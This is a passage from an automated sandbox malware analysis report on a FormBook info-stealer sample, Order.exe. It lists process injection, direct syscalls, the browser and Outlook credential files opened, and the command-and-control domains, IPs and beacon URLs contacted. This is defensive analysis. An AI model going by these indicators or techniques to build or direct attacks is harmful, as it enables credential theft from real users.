                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Order.exeMemory written: C:\Users\user\Desktop\Order.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Order.exeSection loaded: NULL target: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 5908Jump to behavior
                Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3127084424.0000000000CB1000.00000002.00000001.00040000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000000.1700183232.0000000000CB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3127084424.0000000000CB1000.00000002.00000001.00040000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000000.1700183232.0000000000CB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3127084424.0000000000CB1000.00000002.00000001.00040000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000000.1700183232.0000000000CB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3127084424.0000000000CB1000.00000002.00000001.00040000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000000.1700183232.0000000000CB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Users\user\Desktop\Order.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554471 Sample: Order.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 34 www.tesetturhanzade.xyz 2->34 36 zz67x.top 2->36 38 13 other IPs or domains 2->38 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 5 other signatures 2->50 10 Order.exe 3 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 34->48 process4 file5 26 C:\Users\user\AppData\Local\...\Order.exe.log, ASCII 10->26 dropped 60 Injects a PE file into a foreign processes 10->60 14 Order.exe 10->14         started        signatures6 process7 signatures8 62 Maps a DLL or memory area into another process 14->62 17 lOYqgVWsbtwCn.exe 14->17 injected process9 dnsIp10 28 ultrawin23.shop 170.39.213.43, 49985, 49986, 49987 PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY Reserved 17->28 30 www.deeplungatlas.org 194.9.94.85, 49981, 49982, 49983 LOOPIASE Sweden 17->30 32 6 other IPs or domains 17->32 40 Found direct / indirect Syscall (likely to bypass EDR) 17->40 21 fc.exe 13 17->21         started        signatures11 process12 signatures13 52 Tries to steal Mail credentials (via file / registry access) 21->52 54 Tries to harvest and steal browser information (history, passwords, etc) 21->54 56 Modifies the context of a thread in another process (thread injection) 21->56 58 2 other signatures 21->58 24 firefox.exe 21->24         started        process14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Order.exe24%ReversingLabsWin32.Trojan.Generic
                Order.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.zz67x.top/45n6/?ZX=G2OXK&ZtwlQ=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYyv3h68wNOsFyKAz31clbs/jf4McL8QfrvpP2aRWMeaeVzG2yiHAO/Jkyn0%Avira URL Cloudsafe
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/?ZX=G2OXK&ZtwlQ=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP20/OCD6R2GxJg22BCsIc2mVLkjoCYHOMomb5GKySOlS/QA9Ktb+YS58Qw0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/jlqg/?ZtwlQ=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1stpe7mm3wauuEAY4FKC8z+iht6Qhedx9FkGs7kW/sJA05D+zdwUDUvmBi&ZX=G2OXK0%Avira URL Cloudsafe
                http://www.vibixx.site/4xim/0%Avira URL Cloudsafe
                http://www.omnibizlux.biz/jlqg/0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXK0%Avira URL Cloudsafe
                http://www.tesetturhanzade.xyz/ur0f/?ZtwlQ=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiEqz+1EU/fdPUgaJ8uSCdsp0ZpxD49H6BZny0S7BKl2GeJmA+Pu+eIAwF&ZX=G2OXK0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
                http://www.zz67x.top/45n6/0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/?ZX=G2OXK&ZtwlQ=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1mrWVaOoSFtg0ZSHozP3aZjl6eIHnZqLtTRSsN9Et6GBTXH3WSnBcOkE90%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/0%Avira URL Cloudsafe
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
                http://www.ultrawin23.shop/53y2/0%Avira URL Cloudsafe
                http://www.sonoscan.org/ew98/?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXK0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
                http://www.deeplungatlas.org/57zf/?ZtwlQ=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmiwp/JS/jJT11lfoMCLi5cvamonTeSDCRL83RdCYlcDH7pRdqC9V4SuntT&ZX=G2OXK0%Avira URL Cloudsafe
                https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
                http://www.vibixx.site0%Avira URL Cloudsafe
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://www.kantinestoel.online/ggvc/0%Avira URL Cloudsafe
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
                https://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf0%Avira URL Cloudsafe
                https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.vibixx.site
                		162.0.211.143
                		truetrue
                  		unknown
                  zz67x.top
                  		38.47.232.194
                  		truetrue
                    		unknown
                    www.sonoscan.org
                    		13.248.169.48
                    		truetrue
                      		unknown
                      www.deeplungatlas.org
                      		194.9.94.85
                      		truetrue
                        		unknown
                        ultrawin23.shop
                        		170.39.213.43
                        		truetrue
                          		unknown
                          natroredirect.natrocdn.com
                          		85.159.66.93
                          		truefalse
                            		high
                            kantinestoel.online
                            		91.184.0.200
                            		truetrue
                              		unknown
                              www.omnibizlux.biz
                              		167.172.133.32
                              		truefalse
                                		high
                                www.ultrawin23.shop
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.zz67x.top
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.tangible.online
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.tesetturhanzade.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.rka6460.online
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.kantinestoel.online
                                          		unknown
                                          		unknownfalse
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.vibixx.site/4xim/?ZX=G2OXK&ZtwlQ=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP20/OCD6R2GxJg22BCsIc2mVLkjoCYHOMomb5GKySOlS/QA9Ktb+YS58Qwtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXKtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.deeplungatlas.org/57zf/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.zz67x.top/45n6/?ZX=G2OXK&ZtwlQ=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYyv3h68wNOsFyKAz31clbs/jf4McL8QfrvpP2aRWMeaeVzG2yiHAO/Jkyntrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.omnibizlux.biz/jlqg/?ZtwlQ=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1stpe7mm3wauuEAY4FKC8z+iht6Qhedx9FkGs7kW/sJA05D+zdwUDUvmBi&ZX=G2OXKtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.vibixx.site/4xim/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.omnibizlux.biz/jlqg/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.tesetturhanzade.xyz/ur0f/?ZtwlQ=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiEqz+1EU/fdPUgaJ8uSCdsp0ZpxD49H6BZny0S7BKl2GeJmA+Pu+eIAwF&ZX=G2OXKtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.zz67x.top/45n6/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kantinestoel.online/ggvc/?ZX=G2OXK&ZtwlQ=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1mrWVaOoSFtg0ZSHozP3aZjl6eIHnZqLtTRSsN9Et6GBTXH3WSnBcOkE9true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sonoscan.org/ew98/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ultrawin23.shop/53y2/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sonoscan.org/ew98/?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXKtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.deeplungatlas.org/57zf/?ZtwlQ=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmiwp/JS/jJT11lfoMCLi5cvamonTeSDCRL83RdCYlcDH7pRdqC9V4SuntT&ZX=G2OXKtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kantinestoel.online/ggvc/true
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

